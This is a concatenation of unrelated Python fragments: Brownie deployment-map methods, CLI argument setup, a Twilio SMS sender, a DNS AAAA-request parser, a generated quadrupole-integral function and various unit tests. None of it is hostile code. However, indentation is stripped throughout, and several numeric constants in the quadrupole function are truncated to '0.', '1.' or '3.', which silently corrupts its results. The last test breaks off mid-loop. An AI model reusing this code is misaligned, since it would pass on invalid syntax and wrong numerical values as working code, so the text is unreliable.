abi_json = compiler.get_abi(changed_sources, solc_version=self._compiler_config['solc'].get('version', None), allow_paths=self._path.as_posix(), remappings=self._compiler_config['solc'].get('remappings', []))
for (name, abi) in abi_json.items():
with self._build_path.joinpath(f'interfaces/{name}.json').open('w') as fp:
json.dump(abi, fp, sort_keys=True, indent=2, default=sorted)
self._build._add_interface(abi)
def _load_dependency_artifacts(self) -> None:
dep_build_path = self._build_path.joinpath('contracts/dependencies/')
for path in list(dep_build_path.glob('**/*.json')):
contract_alias = path.relative_to(dep_build_path).with_suffix('').as_posix()
if self._build.get_dependents(contract_alias):
with path.open() as fp:
build_json = json.load(fp)
self._build._add_contract(build_json, contract_alias)
else:
path.unlink()
def _load_deployments(self) -> None:
if ((CONFIG.network_type != 'live') and (not CONFIG.settings['dev_deployment_artifacts'])):
return
chainid = (CONFIG.active_network['chainid'] if (CONFIG.network_type == 'live') else 'dev')
path = self._build_path.joinpath(f'deployments/{chainid}')
path.mkdir(exist_ok=True)
deployments = list(path.glob('*.json'))
deployments.sort(key=(lambda k: k.stat().st_mtime))
deployment_map = self._load_deployment_map()
for build_json in deployments:
with build_json.open() as fp:
build = json.load(fp)
contract_name = build['contractName']
if (contract_name not in self._containers):
build_json.unlink()
continue
if ('pcMap' in build):
contract = ProjectContract(self, build, build_json.stem)
else:
contract = Contract.from_abi(contract_name, build_json.stem, build['abi'])
contract._project = self
container = self._containers[contract_name]
_add_contract(contract)
container._contracts.append(contract)
instances = deployment_map.setdefault(chainid, {}).setdefault(contract_name, [])
if (build_json.stem in instances):
instances.remove(build_json.stem)
instances.insert(0, build_json.stem)
self._save_deployment_map(deployment_map)
def _load_deployment_map(self) -> Dict:
deployment_map: Dict = {}
map_path = self._build_path.joinpath('deployments/map.json')
if map_path.exists():
with map_path.open('r') as fp:
deployment_map = json.load(fp)
return deployment_map
def _save_deployment_map(self, deployment_map: Dict) -> None:
with self._build_path.joinpath('deployments/map.json').open('w') as fp:
json.dump(deployment_map, fp, sort_keys=True, indent=2, default=sorted)
def _remove_from_deployment_map(self, contract: ProjectContract) -> None:
if ((CONFIG.network_type != 'live') and (not CONFIG.settings['dev_deployment_artifacts'])):
return
chainid = (CONFIG.active_network['chainid'] if (CONFIG.network_type == 'live') else 'dev')
deployment_map = self._load_deployment_map()
try:
deployment_map[chainid][contract._name].remove(contract.address)
if (not deployment_map[chainid][contract._name]):
del deployment_map[chainid][contract._name]
if (not deployment_map[chainid]):
del deployment_map[chainid]
except (KeyError, ValueError):
pass
self._save_deployment_map(deployment_map)
def _add_to_deployment_map(self, contract: ProjectContract) -> None:
if ((CONFIG.network_type != 'live') and (not CONFIG.settings['dev_deployment_artifacts'])):
return
chainid = (CONFIG.active_network['chainid'] if (CONFIG.network_type == 'live') else 'dev')
deployment_map = self._load_deployment_map()
try:
deployment_map[chainid][contract._name].remove(contract.address)
except (ValueError, KeyError):
pass
deployment_map.setdefault(chainid, {}).setdefault(contract._name, []).insert(0, contract.address)
self._save_deployment_map(deployment_map)
def _update_and_register(self, dict_: Any) -> None:
dict_.update(self)
if ('interface' not in dict_):
dict_['interface'] = self.interface
self._namespaces.append(dict_)
def _add_to_main_namespace(self) -> None:
brownie: Any = sys.modules['brownie']
if ('interface' not in brownie.__dict__):
brownie.__dict__['interface'] = self.interface
brownie.__dict__.update(self._containers)
brownie.__all__.extend(self.__all__)
def _remove_from_main_namespace(self) -> None:
brownie: Any = sys.modules['brownie']
if (brownie.__dict__.get('interface') == self.interface):
del brownie.__dict__['interface']
for key in self._containers:
brownie.__dict__.pop(key, None)
for key in self.__all__:
if (key in brownie.__all__):
brownie.__all__.remove(key)
def __repr__(self) -> str:
return f"<Project '{self._name}'>"
def load_config(self) -> None:
if isinstance(self._path, Path):
_load_project_config(self._path)
def close(self, raises: bool=True) -> None:
if (not self._active):
if (not raises):
return
raise ProjectNotFound('Project is not currently loaded.')
for dict_ in self._namespaces:
for key in [k for (k, v) in dict_.items() if ((v == self) or ((k in self) and (v == self[k])))]:
del dict_[key]
for contract in [x for v in self._containers.values() for x in v._contracts]:
_remove_contract(contract)
for container in self._containers.values():
container._contracts.clear()
self._containers.clear()
self._remove_from_main_namespace()
name = self._name
del sys.modules[f'brownie.project.{name}']
sys.modules['brownie.project'].__all__.remove(name)
sys.modules['brownie.project'].__console_dir__.remove(name)
self._active = False
_loaded_projects.remove(self)
try:
sys.path.remove(str(self._path))
except ValueError:
pass
def _clear_dev_deployments(self, height: int) -> None:
path = self._build_path.joinpath('deployments/dev')
if path.exists():
deployment_map = self._load_deployment_map()
for deployment in path.glob('*.json'):
if (height == 0):
deployment.unlink()
else:
with deployment.open('r') as fp:
deployment_artifact = json.load(fp)
block_height = deployment_artifact['deployment']['blockHeight']
address = deployment_artifact['deployment']['address']
contract_name = deployment_artifact['contractName']
if (block_height > height):
deployment.unlink()
try:
deployment_map['dev'][contract_name].remove(address)
except (KeyError, ValueError):
pass
if (('dev' in deployment_map) and ((height == 0) or (not deployment_map['dev']))):
del deployment_map['dev']
shutil.rmtree(path)
self._save_deployment_map(deployment_map)
def _revert(self, height: int) -> None:
self._clear_dev_deployments(height)
def _reset(self) -> None:
self._clear_dev_deployments(0) |
def add_tile_arguments(parser: argparse.ArgumentParser) -> None:
parser.add_argument('-c', '--coordinates', metavar='<latitude>,<longitude>', help='coordinates of any location inside the tile')
parser.add_argument('-t', '--tile', metavar='<zoom level>/<x>/<y>', help='tile specification')
parser.add_argument('--cache', help='path for temporary OSM files', default='cache', metavar='<path>')
parser.add_argument('-b', '--boundary-box', help='construct the minimum amount of tiles that cover the requested boundary box', metavar='<lon1>,<lat1>,<lon2>,<lat2>')
parser.add_argument('-z', '--zoom', type=str, metavar='<range>', help='OSM zoom levels; can be list of numbers or ranges, e.g. `16-18`, `16,17,18`, or `16,18-20`', default='18')
parser.add_argument('-i', '--input', dest='input_file_name', metavar='<path>', help='input OSM XML file name (if not specified, the file will be downloaded using the OpenStreetMap API)') |
def test_affine_index_range7():
def bar(N: size):
assert (N >= 1)
assert (N <= 5)
for i in seq(0, 6):
for j in seq(0, (((- 3) + ((i + 2) * 5)) - N)):
pass
e = bar.find('for j in _:_').hi()._impl._node
i_sym = bar.find('for i in _:_')._impl._node.iter
N_sym = bar._loopir_proc.args[0].name
e_range = index_range_analysis(e, {i_sym: (0, 5), N_sym: (1, 5)})
assert (e_range == (2, 31)) |
class VelhopStation(BikeShareStation):
def __init__(self, data):
super(VelhopStation, self).__init__()
self.name = data['na']
self.latitude = float(data['coordonnees']['lat'])
self.longitude = float(data['coordonnees']['lon'])
self.bikes = int(data['av'])
self.free = int(data['fr'])
renting = (int(data['is_renting']) == 1)
returning = (int(data['is_returning']) == 1)
self.extra = {'uid': data['id'], 'slots': int(data['to']), 'renting': renting, 'returning': returning, 'online': (renting and returning), 'last_update': data['last_reported']} |
class SettingsSelect(InteractiveEntityBase, SelectEntity):
def device_class(self) -> str:
return f'{DOMAIN}__settings'
def translation_key(self) -> str:
return 'settings'
def name_ext(self) -> (str | None):
if ((self._key in self._appliance.settings) and self._appliance.settings[self._key].name):
return self._appliance.settings[self._key].name
return None
def icon(self) -> str:
return self.get_entity_setting('icon', 'mdi:tune')
def available(self) -> bool:
return (super().available and (('BSH.Common.Status.RemoteControlActive' not in self._appliance.status) or self._appliance.status['BSH.Common.Status.RemoteControlActive'].value))
def options(self) -> list[str]:
try:
return self._appliance.settings[self._key].allowedvalues
except Exception as ex:
pass
return []
def current_option(self) -> str:
return self._appliance.settings[self._key].value
async def async_select_option(self, option: str) -> None:
try:
(await self._appliance.async_apply_setting(self._key, option))
except HomeConnectError as ex:
if ex.error_description:
raise HomeAssistantError(f'Failed to apply the setting: {ex.error_description} ({ex.code})')
raise HomeAssistantError(f'Failed to apply the setting: ({ex.code})')
async def async_on_update(self, appliance: Appliance, key: str, value) -> None:
self.async_write_ha_state() |
def extractDawninfinityBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Dawn Infinity', 'Dawn Infinity', 'oel'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class ForLoopNodeSerializer(LoopNodeSerializer):
def serialize(self, node: ForLoopNode) -> Dict:
data = super().serialize(node)
data.update({'declaration': self._pseudo.serialize(node.declaration), 'modification': self._pseudo.serialize(node.modification)})
return data
def deserialize(self, data: dict) -> ForLoopNode:
return ForLoopNode(declaration=self._pseudo.deserialize(data['declaration']), condition=LogicCondition.deserialize(data['condition'], self._group.new_context), modification=self._pseudo.deserialize(data['modification']), reaching_condition=LogicCondition.deserialize(data['rc'], self._group.new_context)) |
def _twilio_sms_dispatcher(messaging_config: MessagingConfig, message: str, to: Optional[str]) -> None:
if (not to):
logger.error('Message failed to send. No phone identity supplied.')
raise MessageDispatchException('No phone identity supplied.')
if (messaging_config.secrets is None):
logger.error('Message failed to send. No config secrets supplied.')
raise MessageDispatchException('No config secrets supplied.')
account_sid = messaging_config.secrets[MessagingServiceSecrets.TWILIO_ACCOUNT_SID.value]
auth_token = messaging_config.secrets[MessagingServiceSecrets.TWILIO_AUTH_TOKEN.value]
messaging_service_id = messaging_config.secrets.get(MessagingServiceSecrets.TWILIO_MESSAGING_SERVICE_SID.value)
sender_phone_number = messaging_config.secrets.get(MessagingServiceSecrets.TWILIO_SENDER_PHONE_NUMBER.value)
client = Client(account_sid, auth_token)
try:
if messaging_service_id:
client.messages.create(to=to, messaging_service_sid=messaging_service_id, body=message)
elif sender_phone_number:
client.messages.create(to=to, from_=sender_phone_number, body=message)
else:
logger.error('Message failed to send. Either sender phone number or messaging service sid must be provided.')
raise MessageDispatchException('Message failed to send. Either sender phone number or messaging service sid must be provided.')
except TwilioRestException as e:
logger.error('Twilio SMS failed to send: {}', Pii(str(e)))
raise MessageDispatchException(f'Twilio SMS failed to send due to: {Pii(e)}') |
class Tracer(BaseComponent, ABC):
name = ComponentType.TRACER.value
def __init__(self, system_app: (SystemApp | None)=None):
super().__init__(system_app)
self.system_app = system_app
def init_app(self, system_app: SystemApp):
self.system_app = system_app
def append_span(self, span: Span):
def start_span(self, operation_name: str, parent_span_id: str=None, span_type: SpanType=None, metadata: Dict=None) -> Span:
def end_span(self, span: Span, **kwargs):
def get_current_span(self) -> Optional[Span]:
def _get_current_storage(self) -> SpanStorage:
def _new_uuid(self) -> str:
return str(uuid.uuid4()) |
def diag_quadrupole3d_04(ax, da, A, bx, db, B, R):
result = numpy.zeros((3, 1, 15), dtype=float)
x0 = (0.5 / (ax + bx))
x1 = ((ax + bx) ** (- 1.0))
x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
x3 = ((- x2) - B[0])
x4 = ((ax * bx) * x1)
x5 = numpy.exp(((- x4) * ((A[0] - B[0]) ** 2)))
x6 = (1. * numpy.sqrt(x1))
x7 = (x5 * x6)
x8 = ((x3 ** 2) * x7)
x9 = (x0 * x7)
x10 = (3.0 * x9)
x11 = (2.0 * x3)
x12 = ((- x2) - R[0])
x13 = (x12 * x7)
x14 = (x10 + (x11 * x13))
x15 = (2.0 * x0)
x16 = (x3 * x7)
x17 = (x0 * (x13 + x16))
x18 = ((x12 * x16) + x9)
x19 = (x18 * x3)
x20 = ((x12 ** 2) * x7)
x21 = (x0 * (x14 + x20))
x22 = (x12 * x18)
x23 = (x17 + x22)
x24 = (x23 * x3)
x25 = (x21 + x24)
x26 = (((2.0 * x0) * (((2.0 * x17) + x19) + x22)) + (x25 * x3))
x27 = (da * db)
x28 = (0. * x27)
x29 = numpy.exp(((- x4) * ((A[1] - B[1]) ** 2)))
x30 = numpy.exp(((- x4) * ((A[2] - B[2]) ** 2)))
x31 = ((3. * x1) * x30)
x32 = (x29 * x31)
x33 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
x34 = ((- x33) - B[1])
x35 = (0. * x27)
x36 = (x34 * x35)
x37 = (x26 * x32)
x38 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
x39 = ((- x38) - B[2])
x40 = (x35 * x39)
x41 = (x30 * x6)
x42 = (x29 * x6)
x43 = ((x34 ** 2) * x42)
x44 = (x0 * x42)
x45 = (x43 + x44)
x46 = (0. * x27)
x47 = (x45 * x46)
x48 = 1.
x49 = ((x39 * x46) * x48)
x50 = ((x39 ** 2) * x41)
x51 = (x0 * x41)
x52 = (x50 + x51)
x53 = (x46 * x52)
x54 = (x34 * x42)
x55 = ((x15 * x54) + (x34 * x45))
x56 = (x23 * x35)
x57 = (x39 * x41)
x58 = (x23 * x48)
x59 = ((x15 * x57) + (x39 * x52))
x60 = (3.0 * x44)
x61 = ((x0 * ((3.0 * x43) + x60)) + (x34 * x55))
x62 = (x20 + x9)
x63 = (x28 * x62)
x64 = (x35 * x62)
x65 = (3.0 * x51)
x66 = ((x0 * ((3.0 * x50) + x65)) + (x39 * x59))
x67 = (x8 + x9)
x68 = ((x15 * x16) + (x3 * x67))
x69 = ((x0 * (x10 + (3.0 * x8))) + (x3 * x68))
x70 = ((- x33) - R[1])
x71 = (x42 * (x70 ** 2))
x72 = (x44 + x71)
x73 = (x28 * x72)
x74 = (x42 * x70)
x75 = (x0 * (x54 + x74))
x76 = (x44 + (x54 * x70))
x77 = (x70 * x76)
x78 = (x75 + x77)
x79 = (x35 * x78)
x80 = (x35 * x72)
x81 = (2.0 * x34)
x82 = (x60 + (x74 * x81))
x83 = (x0 * (x71 + x82))
x84 = (x34 * x78)
x85 = (x83 + x84)
x86 = (x46 * x67)
x87 = (x48 * x78)
x88 = (x34 * x76)
x89 = (((2.0 * x0) * (((2.0 * x75) + x77) + x88)) + (x34 * x85))
x90 = (x31 * x89)
x91 = (x3 * x5)
x92 = (x35 * x91)
x93 = (x28 * x5)
x94 = ((- x38) - R[2])
x95 = (x41 * (x94 ** 2))
x96 = (x51 + x95)
x97 = (x28 * x96)
x98 = (x35 * x96)
x99 = (x41 * x94)
x100 = (x0 * (x57 + x99))
x101 = (x51 + (x57 * x94))
x102 = (x101 * x94)
x103 = (x100 + x102)
x104 = (x103 * x35)
x105 = (x103 * x48)
x106 = (2.0 * x39)
x107 = ((x106 * x99) + x65)
x108 = (x0 * (x107 + x95))
x109 = (x103 * x39)
x110 = (x108 + x109)
x111 = ((3. * x1) * x29)
x112 = (x101 * x39)
x113 = (((2.0 * x0) * (((2.0 * x100) + x102) + x112)) + (x110 * x39))
x114 = (x111 * x113)
result[(0, 0, 0)] = numpy.sum(((x28 * x32) * ((x0 * ((((x11 * (x17 + x19)) + (x15 * (x14 + x8))) + (3.0 * x21)) + (3.0 * x24))) + (x26 * x3))))
result[(0, 0, 1)] = numpy.sum((x36 * x37))
result[(0, 0, 2)] = numpy.sum((x37 * x40))
result[(0, 0, 3)] = numpy.sum(((x25 * x41) * x47))
result[(0, 0, 4)] = numpy.sum((((x25 * x32) * x34) * x49))
result[(0, 0, 5)] = numpy.sum(((x25 * x42) * x53))
result[(0, 0, 6)] = numpy.sum(((x41 * x55) * x56))
result[(0, 0, 7)] = numpy.sum(((x47 * x57) * x58))
result[(0, 0, 8)] = numpy.sum(((x53 * x54) * x58))
result[(0, 0, 9)] = numpy.sum(((x42 * x56) * x59))
result[(0, 0, 10)] = numpy.sum(((x41 * x61) * x63))
result[(0, 0, 11)] = numpy.sum(((x55 * x57) * x64))
result[(0, 0, 12)] = numpy.sum(((x45 * x53) * x62))
result[(0, 0, 13)] = numpy.sum(((x54 * x59) * x64))
result[(0, 0, 14)] = numpy.sum(((x42 * x63) * x66))
result[(1, 0, 0)] = numpy.sum(((x41 * x69) * x73))
result[(1, 0, 1)] = numpy.sum(((x41 * x68) * x79))
result[(1, 0, 2)] = numpy.sum(((x57 * x68) * x80))
result[(1, 0, 3)] = numpy.sum(((x41 * x85) * x86))
result[(1, 0, 4)] = numpy.sum(((x57 * x86) * x87))
result[(1, 0, 5)] = numpy.sum(((x53 * x67) * x72))
result[(1, 0, 6)] = numpy.sum((x90 * x92))
result[(1, 0, 7)] = numpy.sum((((x31 * x49) * x85) * x91))
result[(1, 0, 8)] = numpy.sum(((x16 * x53) * x87))
result[(1, 0, 9)] = numpy.sum(((x16 * x59) * x80))
result[(1, 0, 10)] = numpy.sum(((x31 * x93) * ((x0 * ((((x15 * (x43 + x82)) + (x81 * (x75 + x88))) + (3.0 * x83)) + (3.0 * x84))) + (x34 * x89))))
result[(1, 0, 11)] = numpy.sum(((x40 * x5) * x90))
result[(1, 0, 12)] = numpy.sum(((x53 * x7) * x85))
result[(1, 0, 13)] = numpy.sum(((x59 * x7) * x79))
result[(1, 0, 14)] = numpy.sum(((x66 * x7) * x73))
result[(2, 0, 0)] = numpy.sum(((x42 * x69) * x97))
result[(2, 0, 1)] = numpy.sum(((x54 * x68) * x98))
result[(2, 0, 2)] = numpy.sum(((x104 * x42) * x68))
result[(2, 0, 3)] = numpy.sum(((x47 * x67) * x96))
result[(2, 0, 4)] = numpy.sum(((x105 * x54) * x86))
result[(2, 0, 5)] = numpy.sum(((x110 * x42) * x86))
result[(2, 0, 6)] = numpy.sum(((x16 * x55) * x98))
result[(2, 0, 7)] = numpy.sum(((x105 * x16) * x47))
result[(2, 0, 8)] = numpy.sum((((((x110 * x111) * x34) * x46) * x48) * x91))
result[(2, 0, 9)] = numpy.sum((x114 * x92))
result[(2, 0, 10)] = numpy.sum(((x61 * x7) * x97))
result[(2, 0, 11)] = numpy.sum(((x104 * x55) * x7))
result[(2, 0, 12)] = numpy.sum(((x110 * x47) * x7))
result[(2, 0, 13)] = numpy.sum(((x114 * x36) * x5))
result[(2, 0, 14)] = numpy.sum(((x111 * x93) * ((x0 * ((((x106 * (x100 + x112)) + (3.0 * x108)) + (3.0 * x109)) + (x15 * (x107 + x50)))) + (x113 * x39))))
return result |
def test_poll_option_from_graphql_alternate_format():
data = {'id': '', 'text': 'abc', 'viewer_has_voted': True, 'voters': {'count': 2, 'edges': [{'node': {'id': '1234'}}, {'node': {'id': '2345'}}]}}
assert (PollOption(text='abc', vote=True, voters=['1234', '2345'], votes_count=2, id='') == PollOption._from_graphql(data)) |
def test_search_result_serialization():
msg = OefSearchMessage(performative=OefSearchMessage.Performative.SEARCH_RESULT, agents=('agent_1', 'agent_2', 'agent_3'), agents_info=OefSearchMessage.AgentsInfo({'key_1': {'key_1': b'value_1', 'key_2': b'value_2'}, 'key_2': {'key_3': b'value_3', 'key_4': b'value_4'}}))
msg.to = 'receiver'
envelope = Envelope(to=msg.to, sender='sender', message=msg)
envelope_bytes = envelope.encode()
actual_envelope = Envelope.decode(envelope_bytes)
expected_envelope = envelope
assert (expected_envelope.to == actual_envelope.to)
assert (expected_envelope.sender == actual_envelope.sender)
assert (expected_envelope.protocol_specification_id == actual_envelope.protocol_specification_id)
assert (expected_envelope.message != actual_envelope.message)
actual_msg = OefSearchMessage.serializer.decode(actual_envelope.message)
actual_msg.to = actual_envelope.to
actual_msg.sender = actual_envelope.sender
expected_msg = msg
assert (expected_msg == actual_msg) |
(scope='function')
def integration_mongodb_config(db) -> ConnectionConfig:
connection_config = ConnectionConfig(key='mongo_example', connection_type=ConnectionType.mongodb, access=AccessLevel.write, secrets=integration_secrets['mongo_example'], name='mongo_example')
connection_config.save(db)
(yield connection_config)
connection_config.delete(db) |
def _start():
global patch, name, path, monitor
global delay, input_scale, input_offset, filename, fileformat, f, recording, filenumber, lock, trigger, item, thread
delay = patch.getfloat('general', 'delay')
input_scale = patch.getfloat('input', 'scale', default=None)
input_offset = patch.getfloat('input', 'offset', default=None)
filename = patch.getstring('recording', 'file')
fileformat = patch.getstring('recording', 'format')
if (fileformat is None):
(name, ext) = os.path.splitext(filename)
fileformat = ext[1:]
f = tempfile.TemporaryFile().close()
recording = False
filenumber = 0
lock = threading.Lock()
trigger = []
monitor.info('Setting up threads for each trigger')
for item in patch.config.items('trigger'):
trigger.append(TriggerThread(item[0]))
monitor.debug((item[0] + ' = OK'))
for thread in trigger:
thread.start()
if len(locals()):
print(('LOCALS: ' + ', '.join(locals().keys()))) |
def is_aaaa_request(dnspkt: bytes):
(xid, flags, questions, answer_rrs, authority_rrs, add_rrs) = struct.unpack(HEADER_FMT, dnspkt[0:12])
if ((flags & 32768) != 0):
return False
if (questions != 1):
return False
is_aaaa = False
dns_fmt_ok = False
dnspkt = dnspkt[12:]
while 1:
try:
length = dnspkt[0]
except IndexError:
break
offset = (length + 1)
dnspkt = dnspkt[offset:]
if (length == 0):
dns_fmt_ok = True
break
''
if (not dns_fmt_ok):
return False
if (len(dnspkt) < 4):
return False
(_type,) = struct.unpack('!H', dnspkt[0:2])
if (_type == 28):
is_aaaa = True
return is_aaaa |
def extractEasyDesignBlog(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('-Yuri War-', "Yuri War of the Demon King's Daughter the Brave Hero Who Incarnates as the Ts Wants to Protect a Peaceful Life Surrounded by Cute Demons and Monster Girls", 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
(wx_available, 'Wx is not available')
class CompositeGridModelTestCase(unittest.TestCase):
def setUp(self):
self.model_1 = SimpleGridModel(data=[[1, 2], [3, 4]], rows=[GridRow(label='foo'), GridRow(label='bar')], columns=[GridColumn(label='cfoo'), GridColumn(label='cbar')])
self.model_2 = SimpleGridModel(data=[[3, 4, 5], [6, 7, 8]], rows=[GridRow(label='baz'), GridRow(label='bat')], columns=[GridColumn(label='cfoo_2'), GridColumn(label='cbar_2'), GridColumn(label='cbaz_2')])
self.model = CompositeGridModel(data=[self.model_1, self.model_2])
def test_get_column_count(self):
column_count_1 = self.model_1.get_column_count()
column_count_2 = self.model_2.get_column_count()
self.assertEqual(self.model.get_column_count(), (column_count_1 + column_count_2))
def test_get_row_count(self):
self.assertEqual(self.model.get_row_count(), 2)
def test_get_row_name(self):
self.assertEqual(self.model.get_row_name(0), '1')
self.assertEqual(self.model.get_row_name(1), '2')
def test_get_column_name(self):
self.assertEqual(self.model.get_column_name(0), 'cfoo')
self.assertEqual(self.model.get_column_name(1), 'cbar')
self.assertEqual(self.model.get_column_name(2), 'cfoo_2')
self.assertEqual(self.model.get_column_name(3), 'cbar_2')
self.assertEqual(self.model.get_column_name(4), 'cbaz_2')
def test_get_value(self):
self.assertEqual(self.model.get_value(0, 0), 1)
self.assertEqual(self.model.get_value(0, 1), 2)
self.assertEqual(self.model.get_value(0, 2), 3)
self.assertEqual(self.model.get_value(0, 3), 4)
self.assertEqual(self.model.get_value(0, 4), 5)
self.assertEqual(self.model.get_value(1, 0), 3)
self.assertEqual(self.model.get_value(1, 1), 4)
self.assertEqual(self.model.get_value(1, 2), 6)
self.assertEqual(self.model.get_value(1, 3), 7)
self.assertEqual(self.model.get_value(1, 4), 8)
def test_is_cell_empty(self):
rows = self.model.get_row_count()
columns = self.model.get_column_count()
self.assertEqual(self.model.is_cell_empty(0, 0), False, 'Cell (0,0) should not be empty.')
self.assertEqual(self.model.is_cell_empty(rows, 0), True, 'Cell below the table should be empty.')
self.assertEqual(self.model.is_cell_empty(0, columns), True, 'Cell right of the table should be empty.')
self.assertEqual(self.model.is_cell_empty(rows, columns), True, 'Cell below and right of table should be empty.')
return |
def calculate_correlation_matrix(X, Y=None):
if (Y is None):
Y = X
n_samples = np.shape(X)[0]
covariance = ((1 / n_samples) * (X - X.mean(0)).T.dot((Y - Y.mean(0))))
std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T))
return np.array(correlation_matrix, dtype=float) |
class PreferencesTest(QuickbooksTestCase):
def setUp(self):
super(PreferencesTest, self).setUp()
self.account_number = datetime.now().strftime('%d%H%M')
self.name = 'Test Account {0}'.format(self.account_number)
def test_get(self):
preferences = Preferences.get(qb=self.qb_client)
self.assertEqual(preferences.Id, '1')
self.assertEqual(preferences.AccountingInfoPrefs.TaxYearMonth, 'January')
self.assertEqual(preferences.ProductAndServicesPrefs.ForPurchase, True)
self.assertEqual(preferences.VendorAndPurchasesPrefs.BillableExpenseTracking, True)
self.assertEqual(preferences.TimeTrackingPrefs.WorkWeekStartDate, 'Monday')
self.assertEqual(preferences.OtherPrefs.NameValue[0].Name, 'SalesFormsPrefs.DefaultCustomerMessage')
def test_update(self):
preferences = Preferences.get(qb=self.qb_client)
subject = datetime.now().strftime('%d%H%M%S')
preferences.EmailMessagesPrefs.EstimateMessage.Subject = subject
preferences.save(qb=self.qb_client)
preferences_updated = Preferences.get(qb=self.qb_client)
self.assertEqual(preferences_updated.EmailMessagesPrefs.EstimateMessage.Subject, subject) |
def evolve_handler_ids(save_stats: dict[(str, Any)], val: int, string: str, ids: list[int], forced: bool) -> dict[(str, Any)]:
ids = helper.check_cat_ids(ids, save_stats)
evolves = save_stats['unlocked_forms']
if (not forced):
form_data = get_evolve_data(helper.check_data_is_jp(save_stats))
length = min([len(ids), len(form_data)])
for i in range(length):
try:
evolves[ids[i]] = form_data[ids[i]]
except IndexError:
pass
else:
for cat_id in ids:
evolves[cat_id] = val
for (cat_id, (unlocked_flag, current_flag)) in enumerate(zip(evolves, save_stats['current_forms'])):
save_stats['current_forms'][cat_id] = max(unlocked_flag, current_flag)
flags_evolved = [(0 if (form == 1) else form) for form in evolves]
save_stats['unlocked_forms'] = flags_evolved
print(f'Successfully {string} true forms of cats')
return save_stats |
def agency_data(helpers):
ta1 = baker.make('references.ToptierAgency', toptier_code='001', abbreviation='ABBR', name='NAME', mission='TO BOLDLY GO', about_agency_data='ABOUT', website='HTTP', justification='BECAUSE', icon_filename='HAI.jpg')
ta2 = baker.make('references.ToptierAgency', toptier_code='002', _fill_optional=True)
sa1 = baker.make('references.SubtierAgency', subtier_code='ST1', _fill_optional=True)
sa2 = baker.make('references.SubtierAgency', subtier_code='ST2', _fill_optional=True)
a1 = baker.make('references.Agency', id=1, toptier_flag=True, toptier_agency=ta1, subtier_agency=sa1, _fill_optional=True)
baker.make('references.Agency', id=2, toptier_flag=True, toptier_agency=ta2, subtier_agency=sa2, _fill_optional=True)
dabs = baker.make('submissions.DABSSubmissionWindowSchedule', submission_reveal_date='2020-10-09', submission_fiscal_year=2020, submission_fiscal_month=12, submission_fiscal_quarter=4, is_quarter=False, period_start_date='2020-09-01', period_end_date='2020-10-01')
sub1 = baker.make('submissions.SubmissionAttributes', toptier_code=ta1.toptier_code, submission_window_id=dabs.id, reporting_fiscal_year=helpers.get_mocked_current_fiscal_year())
baker.make('submissions.SubmissionAttributes', toptier_code=ta2.toptier_code, submission_window_id=dabs.id)
tas1 = baker.make('accounts.TreasuryAppropriationAccount', funding_toptier_agency=ta1)
tas2 = baker.make('accounts.TreasuryAppropriationAccount', funding_toptier_agency=ta2)
baker.make('accounts.AppropriationAccountBalances', treasury_account_identifier=tas1, submission=sub1)
baker.make('accounts.AppropriationAccountBalances', treasury_account_identifier=tas2, submission=sub1)
baker.make('search.TransactionSearch', transaction_id=1, awarding_agency_id=a1.id, fiscal_year=helpers.get_mocked_current_fiscal_year())
defc = baker.make('references.DisasterEmergencyFundCode', code='L', group_name='covid_19', public_law='LAW', title='title')
baker.make('financial_activities.FinancialAccountsByProgramActivityObjectClass', submission=sub1, treasury_account=tas1, disaster_emergency_fund=defc) |
class FinancialLineItem(BaseModel):
tax: Optional[float] = Field(default=None, description='Tax amount for the line item.')
amount_line: Optional[float] = Field(default=None, description='Total amount for the line item.')
description: Optional[StrictStr] = Field(default=None, description='Description of the line item.')
quantity: Optional[float] = Field(default=None, description='Quantity of units for the line item.')
unit_price: Optional[float] = Field(default=None, description='Unit price for each unit in the line item.')
unit_type: Optional[StrictStr] = Field(default=None, description='Type of unit (e.g., hours, items).')
date: Optional[StrictStr] = Field(default=None, description='Date associated with the line item.')
product_code: Optional[StrictStr] = Field(default=None, description='Product code or identifier for the line item.')
purchase_order: Optional[StrictStr] = Field(default=None, description='Purchase order related to the line item.')
tax_rate: Optional[float] = Field(default=None, description='Tax rate applied to the line item.')
base_total: Optional[float] = Field(default=None, description='Base total amount before any discounts or taxes.')
sub_total: Optional[float] = Field(default=None, description='Subtotal amount for the line item.')
discount_amount: Optional[float] = Field(default=None, description='Amount of discount applied to the line item.')
discount_rate: Optional[float] = Field(default=None, description='Rate of discount applied to the line item.')
discount_code: Optional[StrictStr] = Field(default=None, description='Code associated with any discount applied to the line item.')
order_number: Optional[StrictStr] = Field(default=None, description='Order number associated with the line item.')
title: Optional[StrictStr] = Field(default=None, description='Title or name of the line item.') |
def unified_yaml_load(configuration_file: Path) -> Dict:
package_type = configuration_file.parent.parent.name
with configuration_file.open(encoding='utf-8') as fp:
if (package_type != 'agents'):
return yaml.safe_load(fp)
data = yaml.safe_load_all(fp)
return list(data)[0] |
def test_copy_traineddata_files_briefcase(tmp_path, monkeypatch):
monkeypatch.setattr(system_info, 'is_briefcase_package', (lambda : True))
with resources.as_file(resources.files('normcap.resources')) as file_path:
resource_path = Path(file_path)
((resource_path / 'tessdata') / 'placeholder_1.traineddata').touch()
((resource_path / 'tessdata') / 'placeholder_2.traineddata').touch()
try:
tessdata_path = (tmp_path / 'tessdata')
traineddatas = list(tessdata_path.glob('*.traineddata'))
txts = list(tessdata_path.glob('*.txt'))
assert (not traineddatas)
assert (not txts)
for _ in range(3):
